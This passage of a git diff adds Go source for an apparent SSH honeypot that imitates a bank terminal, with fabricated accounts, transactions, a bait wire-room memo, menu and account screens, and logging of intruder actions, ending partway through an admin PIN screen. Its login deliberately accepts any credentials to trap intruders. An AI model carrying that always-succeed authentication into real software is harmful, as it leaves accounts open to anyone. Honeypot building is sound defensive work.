EFFECTIVE NEXT MONDAY, FEDWIRE CUTOFF TIMES ARE:
|
||||||
|
DOMESTIC WIRES: 16:30 EST (WAS 17:00)
|
||||||
|
INTERNATIONAL WIRES: 14:00 EST (NO CHANGE)
|
||||||
|
BOOK TRANSFERS: 17:30 EST (NO CHANGE)
|
||||||
|
|
||||||
|
WIRES SUBMITTED AFTER CUTOFF WILL BE QUEUED FOR NEXT
|
||||||
|
BUSINESS DAY PROCESSING.
|
||||||
|
|
||||||
|
FOR EMERGENCY SAME-DAY PROCESSING AFTER CUTOFF:
|
||||||
|
CONTACT WIRE ROOM: EXT 4450
|
||||||
|
AUTH CODE REQUIRED (OBTAIN FROM BRANCH MANAGER)
|
||||||
|
APPROVAL CHAIN: OPS-MGR -> VP-WIRE -> SVP-TREASURY
|
||||||
|
|
||||||
|
CORRESPONDENT BANK CONTACTS:
|
||||||
|
JPMORGAN: wire.ops@jpmc.com / 212-555-0147
|
||||||
|
CITI: fedwire@citi.com / 212-555-0283`,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
return &bankState{
|
||||||
|
Accounts: accounts,
|
||||||
|
Transactions: transactions,
|
||||||
|
Messages: messages,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func generateCheckingTxns(now time.Time, endBalance int64) []Transaction {
|
||||||
|
txns := []Transaction{
|
||||||
|
{Description: "ACH DEPOSIT - PAYROLL", Amount: 485000},
|
||||||
|
{Description: "CHECK #1847", Amount: -125000},
|
||||||
|
{Description: "POS DEBIT - WHOLE FOODS #1284", Amount: -18743},
|
||||||
|
{Description: "ATM WITHDRAWAL - MAIN ST BRANCH", Amount: -40000},
|
||||||
|
{Description: "ACH DEBIT - MORTGAGE PMT", Amount: -215000},
|
||||||
|
{Description: "WIRE TRANSFER IN - REF#8847201", Amount: 1250000},
|
||||||
|
{Description: "POS DEBIT - SHELL OIL #4492", Amount: -6821},
|
||||||
|
{Description: "ACH DEPOSIT - PAYROLL", Amount: 485000},
|
||||||
|
{Description: "CHECK #1848", Amount: -75000},
|
||||||
|
{Description: "ONLINE TRANSFER TO SAVINGS", Amount: -100000},
|
||||||
|
{Description: "POS DEBIT - AMAZON.COM", Amount: -14599},
|
||||||
|
{Description: "ACH DEBIT - ELECTRIC COMPANY", Amount: -18742},
|
||||||
|
{Description: "ATM WITHDRAWAL - PARK AVE BRANCH", Amount: -20000},
|
||||||
|
{Description: "WIRE TRANSFER OUT - REF#9014882", Amount: -500000},
|
||||||
|
{Description: "POS DEBIT - COSTCO #0441", Amount: -28734},
|
||||||
|
{Description: "ACH DEPOSIT - TAX REFUND", Amount: 342100},
|
||||||
|
}
|
||||||
|
return populateTransactions(txns, now, endBalance)
|
||||||
|
}
|
||||||
|
|
||||||
|
func generateSavingsTxns(now time.Time, endBalance int64) []Transaction {
|
||||||
|
txns := []Transaction{
|
||||||
|
{Description: "INTEREST PAYMENT", Amount: 4521},
|
||||||
|
{Description: "ONLINE TRANSFER FROM CHECKING", Amount: 100000},
|
||||||
|
{Description: "INTEREST PAYMENT", Amount: 4633},
|
||||||
|
{Description: "ACH DEPOSIT - DIVIDEND PMT", Amount: 125000},
|
||||||
|
{Description: "ONLINE TRANSFER FROM CHECKING", Amount: 200000},
|
||||||
|
{Description: "INTEREST PAYMENT", Amount: 4748},
|
||||||
|
{Description: "WITHDRAWAL - TRANSFER TO MM", Amount: -500000},
|
||||||
|
{Description: "INTEREST PAYMENT", Amount: 4812},
|
||||||
|
}
|
||||||
|
return populateTransactions(txns, now, endBalance)
|
||||||
|
}
|
||||||
|
|
||||||
|
func generateMoneyMarketTxns(now time.Time, endBalance int64) []Transaction {
|
||||||
|
txns := []Transaction{
|
||||||
|
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 21847},
|
||||||
|
{Description: "DEPOSIT - TRANSFER FROM SAVINGS", Amount: 500000},
|
||||||
|
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 22105},
|
||||||
|
{Description: "WITHDRAWAL - WIRE TRANSFER", Amount: -1000000},
|
||||||
|
{Description: "DEPOSIT - ACH TRANSFER", Amount: 750000},
|
||||||
|
{Description: "INTEREST PAYMENT - TIER 3 RATE", Amount: 22394},
|
||||||
|
}
|
||||||
|
return populateTransactions(txns, now, endBalance)
|
||||||
|
}
|
||||||
|
|
||||||
|
func generateCDTxns(now time.Time, endBalance int64) []Transaction {
|
||||||
|
txns := []Transaction{
|
||||||
|
{Description: "CERTIFICATE OPENED - 12MO TERM", Amount: 25000000},
|
||||||
|
{Description: "INTEREST ACCRUAL", Amount: 10417},
|
||||||
|
{Description: "INTEREST ACCRUAL", Amount: 10417},
|
||||||
|
{Description: "INTEREST ACCRUAL", Amount: 10417},
|
||||||
|
}
|
||||||
|
return populateTransactions(txns, now, endBalance)
|
||||||
|
}
|
||||||
|
|
||||||
|
func populateTransactions(txns []Transaction, now time.Time, endBalance int64) []Transaction {
|
||||||
|
// Work backwards from end balance to assign dates and running balances.
|
||||||
|
bal := endBalance
|
||||||
|
for i := len(txns) - 1; i >= 0; i-- {
|
||||||
|
txns[i].Balance = bal
|
||||||
|
txns[i].Date = now.Add(time.Duration(-(len(txns) - i)) * 3 * 24 * time.Hour).Format("01/02/2006")
|
||||||
|
bal -= txns[i].Amount
|
||||||
|
}
|
||||||
|
return txns
|
||||||
|
}
|
||||||
353
internal/shell/banking/model.go
Normal file
353
internal/shell/banking/model.go
Normal file
@@ -0,0 +1,353 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
type screen int
|
||||||
|
|
||||||
|
const (
|
||||||
|
screenLogin screen = iota
|
||||||
|
screenMenu
|
||||||
|
screenAccountSummary
|
||||||
|
screenAccountDetail
|
||||||
|
screenTransfer
|
||||||
|
screenHistory
|
||||||
|
screenMessages
|
||||||
|
screenChangePin
|
||||||
|
screenAdmin
|
||||||
|
)
|
||||||
|
|
||||||
|
type model struct {
|
||||||
|
sess *shell.SessionContext
|
||||||
|
bankName string
|
||||||
|
terminalID string
|
||||||
|
region string
|
||||||
|
state *bankState
|
||||||
|
screen screen
|
||||||
|
quitting bool
|
||||||
|
height int
|
||||||
|
|
||||||
|
login loginModel
|
||||||
|
menu menuModel
|
||||||
|
summary accountSummaryModel
|
||||||
|
detail accountDetailModel
|
||||||
|
transfer transferModel
|
||||||
|
history historyModel
|
||||||
|
messages messagesModel
|
||||||
|
admin adminModel
|
||||||
|
changePin changePinModel
|
||||||
|
}
|
||||||
|
|
||||||
|
func newModel(sess *shell.SessionContext, bankName, terminalID, region string) *model {
|
||||||
|
state := newBankState()
|
||||||
|
unread := 0
|
||||||
|
for _, msg := range state.Messages {
|
||||||
|
if msg.Unread {
|
||||||
|
unread++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return &model{
|
||||||
|
sess: sess,
|
||||||
|
bankName: bankName,
|
||||||
|
terminalID: terminalID,
|
||||||
|
region: region,
|
||||||
|
state: state,
|
||||||
|
screen: screenLogin,
|
||||||
|
login: newLoginModel(bankName),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) Init() tea.Cmd {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
if m.quitting {
|
||||||
|
return m, tea.Quit
|
||||||
|
}
|
||||||
|
|
||||||
|
switch msg := msg.(type) {
|
||||||
|
case tea.WindowSizeMsg:
|
||||||
|
m.height = msg.Height
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyMsg:
|
||||||
|
if msg.Type == tea.KeyCtrlC {
|
||||||
|
m.quitting = true
|
||||||
|
return m, tea.Quit
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
switch m.screen {
|
||||||
|
case screenLogin:
|
||||||
|
return m.updateLogin(msg)
|
||||||
|
case screenMenu:
|
||||||
|
return m.updateMenu(msg)
|
||||||
|
case screenAccountSummary:
|
||||||
|
return m.updateAccountSummary(msg)
|
||||||
|
case screenAccountDetail:
|
||||||
|
return m.updateAccountDetail(msg)
|
||||||
|
case screenTransfer:
|
||||||
|
return m.updateTransfer(msg)
|
||||||
|
case screenHistory:
|
||||||
|
return m.updateHistory(msg)
|
||||||
|
case screenMessages:
|
||||||
|
return m.updateMessages(msg)
|
||||||
|
case screenChangePin:
|
||||||
|
return m.updateChangePin(msg)
|
||||||
|
case screenAdmin:
|
||||||
|
return m.updateAdmin(msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) View() string {
|
||||||
|
var content string
|
||||||
|
switch m.screen {
|
||||||
|
case screenLogin:
|
||||||
|
content = m.login.View()
|
||||||
|
case screenMenu:
|
||||||
|
content = m.menu.View()
|
||||||
|
case screenAccountSummary:
|
||||||
|
content = m.summary.View()
|
||||||
|
case screenAccountDetail:
|
||||||
|
content = m.detail.View()
|
||||||
|
case screenTransfer:
|
||||||
|
content = m.transfer.View()
|
||||||
|
case screenHistory:
|
||||||
|
content = m.history.View()
|
||||||
|
case screenMessages:
|
||||||
|
content = m.messages.View()
|
||||||
|
case screenChangePin:
|
||||||
|
content = m.changePin.View()
|
||||||
|
case screenAdmin:
|
||||||
|
content = m.admin.View()
|
||||||
|
}
|
||||||
|
|
||||||
|
return screenFrame(m.bankName, m.terminalID, m.region, content, m.height)
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Screen update handlers ---
|
||||||
|
|
||||||
|
func (m *model) updateLogin(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.login, cmd = m.login.Update(msg)
|
||||||
|
|
||||||
|
if m.login.stage == 2 {
|
||||||
|
// Login always succeeds — this is a honeypot.
|
||||||
|
logCmd := logAction(m.sess, fmt.Sprintf("LOGIN acct=%s", m.login.accountNum), "ACCESS GRANTED")
|
||||||
|
clearCmd := m.goToMenu()
|
||||||
|
return m, tea.Batch(cmd, logCmd, clearCmd)
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateMenu(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.menu, cmd = m.menu.Update(msg)
|
||||||
|
|
||||||
|
if keyMsg, ok := msg.(tea.KeyMsg); ok && keyMsg.Type == tea.KeyEnter {
|
||||||
|
choice := strings.TrimSpace(m.menu.choice)
|
||||||
|
switch choice {
|
||||||
|
case "1":
|
||||||
|
m.screen = screenAccountSummary
|
||||||
|
m.summary = newAccountSummaryModel(m.state.Accounts)
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 1", "ACCOUNT SUMMARY"))
|
||||||
|
case "2":
|
||||||
|
m.screen = screenAccountDetail
|
||||||
|
m.detail = newAccountDetailModel(m.state.Accounts, m.state.Transactions)
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 2", "ACCOUNT DETAIL"))
|
||||||
|
case "3":
|
||||||
|
m.screen = screenTransfer
|
||||||
|
m.transfer = newTransferModel()
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 3", "WIRE TRANSFER"))
|
||||||
|
case "4":
|
||||||
|
m.screen = screenHistory
|
||||||
|
m.history = newHistoryModel(m.state.Accounts, m.state.Transactions)
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 4", "TRANSACTION HISTORY"))
|
||||||
|
case "5":
|
||||||
|
m.screen = screenMessages
|
||||||
|
m.messages = newMessagesModel(m.state.Messages)
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 5", "SECURE MESSAGES"))
|
||||||
|
case "6":
|
||||||
|
m.screen = screenChangePin
|
||||||
|
m.changePin = newChangePinModel()
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "MENU 6", "CHANGE PIN"))
|
||||||
|
case "7":
|
||||||
|
m.quitting = true
|
||||||
|
return m, tea.Batch(logAction(m.sess, "LOGOUT", "SESSION ENDED"), tea.Quit)
|
||||||
|
case "99", "admin", "ADMIN":
|
||||||
|
m.screen = screenAdmin
|
||||||
|
m.admin = newAdminModel()
|
||||||
|
return m, tea.Batch(tea.ClearScreen, logAction(m.sess, "ADMIN ACCESS ATTEMPT", "ADMIN SCREEN SHOWN"))
|
||||||
|
}
|
||||||
|
// Invalid choice, reset.
|
||||||
|
m.menu.choice = ""
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateAccountSummary(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
if _, ok := msg.(tea.KeyMsg); ok {
|
||||||
|
return m, m.goToMenu()
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateAccountDetail(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.detail, cmd = m.detail.Update(msg)
|
||||||
|
if m.detail.choice == "back" {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateTransfer(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
prevStep := m.transfer.step
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.transfer, cmd = m.transfer.Update(msg)
|
||||||
|
|
||||||
|
// Transfer cancelled.
|
||||||
|
if m.transfer.confirm == "cancelled" {
|
||||||
|
clearCmd := m.goToMenu()
|
||||||
|
return m, tea.Batch(clearCmd, logAction(m.sess, "WIRE TRANSFER CANCELLED", "USER CANCELLED"))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Clear screen when transfer steps change content height significantly
|
||||||
|
// (e.g. confirm→authcode, fields→confirm, authcode→complete).
|
||||||
|
if m.transfer.step != prevStep {
|
||||||
|
cmd = tea.Batch(cmd, tea.ClearScreen)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Transfer completed — log it.
|
||||||
|
if m.transfer.step == transferStepComplete && prevStep != transferStepComplete {
|
||||||
|
t := m.transfer.transfer
|
||||||
|
m.state.Transfers = append(m.state.Transfers, t)
|
||||||
|
logMsg := fmt.Sprintf("WIRE TRANSFER: routing=%s dest=%s beneficiary=%s bank=%s amount=%s memo=%s auth=%s",
|
||||||
|
t.RoutingNumber, t.DestAccount, t.Beneficiary, t.BankName, t.Amount, t.Memo, t.AuthCode)
|
||||||
|
return m, tea.Batch(cmd, logAction(m.sess, logMsg, "TRANSFER QUEUED"))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Completed screen → any key goes back.
|
||||||
|
if m.transfer.step == transferStepComplete {
|
||||||
|
if _, ok := msg.(tea.KeyMsg); ok && prevStep == transferStepComplete {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateHistory(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.history, cmd = m.history.Update(msg)
|
||||||
|
if m.history.choice == "back" {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateMessages(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.messages, cmd = m.messages.Update(msg)
|
||||||
|
if m.messages.choice == "back" {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
// Log when viewing a message.
|
||||||
|
if m.messages.viewing >= 0 {
|
||||||
|
idx := m.messages.viewing
|
||||||
|
return m, tea.Batch(cmd, logAction(m.sess,
|
||||||
|
fmt.Sprintf("VIEW MESSAGE #%d", idx+1),
|
||||||
|
m.state.Messages[idx].Subj))
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateChangePin(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
prevStage := m.changePin.stage
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.changePin, cmd = m.changePin.Update(msg)
|
||||||
|
|
||||||
|
// Log successful PIN change.
|
||||||
|
if m.changePin.stage == 3 && prevStage != 3 {
|
||||||
|
cmd = tea.Batch(cmd, logAction(m.sess, "CHANGE PIN", "PIN CHANGED SUCCESSFULLY"))
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.changePin.done {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) updateAdmin(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||||
|
prevLocked := m.admin.locked
|
||||||
|
prevAttempts := m.admin.attempts
|
||||||
|
|
||||||
|
// Check for ESC before delegating.
|
||||||
|
if keyMsg, ok := msg.(tea.KeyMsg); ok && keyMsg.Type == tea.KeyEscape && !m.admin.locked {
|
||||||
|
return m, m.goToMenu()
|
||||||
|
}
|
||||||
|
|
||||||
|
var cmd tea.Cmd
|
||||||
|
m.admin, cmd = m.admin.Update(msg)
|
||||||
|
|
||||||
|
// Log failed attempts.
|
||||||
|
if m.admin.attempts > prevAttempts {
|
||||||
|
cmd = tea.Batch(cmd, logAction(m.sess,
|
||||||
|
fmt.Sprintf("ADMIN PIN ATTEMPT #%d", m.admin.attempts),
|
||||||
|
"INVALID CREDENTIALS"))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Log lockout.
|
||||||
|
if m.admin.locked && !prevLocked {
|
||||||
|
cmd = tea.Batch(cmd, tea.ClearScreen, logAction(m.sess,
|
||||||
|
"ADMIN LOCKOUT",
|
||||||
|
"TERMINAL LOCKED - INCIDENT LOGGED"))
|
||||||
|
}
|
||||||
|
|
||||||
|
// If locked and any key pressed, go back.
|
||||||
|
if m.admin.locked {
|
||||||
|
if _, ok := msg.(tea.KeyMsg); ok && prevLocked {
|
||||||
|
return m, tea.Batch(cmd, m.goToMenu())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return m, cmd
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *model) goToMenu() tea.Cmd {
|
||||||
|
unread := 0
|
||||||
|
for _, msg := range m.state.Messages {
|
||||||
|
if msg.Unread {
|
||||||
|
unread++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
m.screen = screenMenu
|
||||||
|
m.menu = newMenuModel(m.bankName, unread)
|
||||||
|
return tea.ClearScreen
|
||||||
|
}
|
||||||
|
|
||||||
|
// logAction returns a tea.Cmd that logs an action to the session store.
|
||||||
|
func logAction(sess *shell.SessionContext, input, output string) tea.Cmd {
|
||||||
|
return func() tea.Msg {
|
||||||
|
if sess.Store != nil {
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
_ = sess.Store.AppendSessionLog(ctx, sess.SessionID, input, output)
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("banking")
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
213
internal/shell/banking/screen_accounts.go
Normal file
213
internal/shell/banking/screen_accounts.go
Normal file
@@ -0,0 +1,213 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
// --- Account Summary ---
|
||||||
|
|
||||||
|
type accountSummaryModel struct {
|
||||||
|
accounts []Account
|
||||||
|
}
|
||||||
|
|
||||||
|
func newAccountSummaryModel(accounts []Account) accountSummaryModel {
|
||||||
|
return accountSummaryModel{accounts: accounts}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountSummaryModel) Update(_ tea.Msg) (accountSummaryModel, tea.Cmd) {
|
||||||
|
// Any key returns to menu.
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountSummaryModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("ACCOUNT SUMMARY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
// Header.
|
||||||
|
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-18s %18s", "ACCOUNT", "TYPE", "BALANCE")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 50)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
total := int64(0)
|
||||||
|
for _, acct := range m.accounts {
|
||||||
|
total += acct.Balance
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-18s %18s",
|
||||||
|
acct.Number, acct.Type, formatCurrency(acct.Balance))))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 50)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-18s %18s", "", "TOTAL", formatCurrency(total))))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Account Detail (with transactions) ---
|
||||||
|
|
||||||
|
type accountDetailModel struct {
|
||||||
|
accounts []Account
|
||||||
|
transactions map[string][]Transaction
|
||||||
|
selected int
|
||||||
|
page int
|
||||||
|
pageSize int
|
||||||
|
choosing bool
|
||||||
|
choice string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newAccountDetailModel(accounts []Account, transactions map[string][]Transaction) accountDetailModel {
|
||||||
|
return accountDetailModel{
|
||||||
|
accounts: accounts,
|
||||||
|
transactions: transactions,
|
||||||
|
choosing: true,
|
||||||
|
pageSize: 10,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountDetailModel) Update(msg tea.Msg) (accountDetailModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.choosing {
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
for i := range m.accounts {
|
||||||
|
if m.choice == fmt.Sprintf("%d", i+1) {
|
||||||
|
m.selected = i
|
||||||
|
m.choosing = false
|
||||||
|
m.page = 0
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if m.choice == "0" {
|
||||||
|
m.choice = "back"
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.choice) > 0 {
|
||||||
|
m.choice = m.choice[:len(m.choice)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' {
|
||||||
|
m.choice += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
switch keyMsg.String() {
|
||||||
|
case "n", "N":
|
||||||
|
acctNum := m.accounts[m.selected].Number
|
||||||
|
txns := m.transactions[acctNum]
|
||||||
|
maxPage := (len(txns) - 1) / m.pageSize
|
||||||
|
if m.page < maxPage {
|
||||||
|
m.page++
|
||||||
|
}
|
||||||
|
case "p", "P":
|
||||||
|
if m.page > 0 {
|
||||||
|
m.page--
|
||||||
|
}
|
||||||
|
case "b", "B":
|
||||||
|
m.choosing = true
|
||||||
|
m.choice = ""
|
||||||
|
default:
|
||||||
|
m.choice = "back"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountDetailModel) View() string {
|
||||||
|
if m.choosing {
|
||||||
|
return m.viewChooseAccount()
|
||||||
|
}
|
||||||
|
return m.viewDetail()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountDetailModel) viewChooseAccount() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("ACCOUNT DETAIL"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" SELECT ACCOUNT:"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
for i, acct := range m.accounts {
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d] %s - %s %s",
|
||||||
|
i+1, acct.Number, acct.Type, formatCurrency(acct.Balance))))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
|
||||||
|
b.WriteString(inputStyle.Render(m.choice))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m accountDetailModel) viewDetail() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
acct := m.accounts[m.selected]
|
||||||
|
txns := m.transactions[acct.Number]
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText(fmt.Sprintf("ACCOUNT DETAIL - %s", acct.Number)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" TYPE: %s", acct.Type)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" BALANCE: %s", formatCurrency(acct.Balance))))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
// Header.
|
||||||
|
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-34s %12s %12s", "DATE", "DESCRIPTION", "AMOUNT", "BALANCE")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 72)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
// Paginate.
|
||||||
|
start := m.page * m.pageSize
|
||||||
|
end := min(start+m.pageSize, len(txns))
|
||||||
|
|
||||||
|
for _, txn := range txns[start:end] {
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-34s %12s %12s",
|
||||||
|
txn.Date, txn.Description, formatCurrency(txn.Amount), formatCurrency(txn.Balance))))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
totalPages := (len(txns) + m.pageSize - 1) / m.pageSize
|
||||||
|
b.WriteString(dimStyle.Render(fmt.Sprintf(" PAGE %d OF %d", m.page+1, totalPages)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" [N]EXT PAGE [P]REV PAGE [B]ACK ANY OTHER KEY = MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
111
internal/shell/banking/screen_admin.go
Normal file
111
internal/shell/banking/screen_admin.go
Normal file
@@ -0,0 +1,111 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type adminModel struct {
|
||||||
|
pin string
|
||||||
|
attempts int
|
||||||
|
locked bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newAdminModel() adminModel {
|
||||||
|
return adminModel{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m adminModel) Update(msg tea.Msg) (adminModel, tea.Cmd) {
|
||||||
|
if m.locked {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
if m.pin != "" {
|
||||||
|
m.attempts++
|
||||||
|
if m.attempts >= 3 {
|
||||||
|
m.locked = true
|
||||||
|
}
|
||||||
|
m.pin = ""
|
||||||
|
}
|
||||||
|
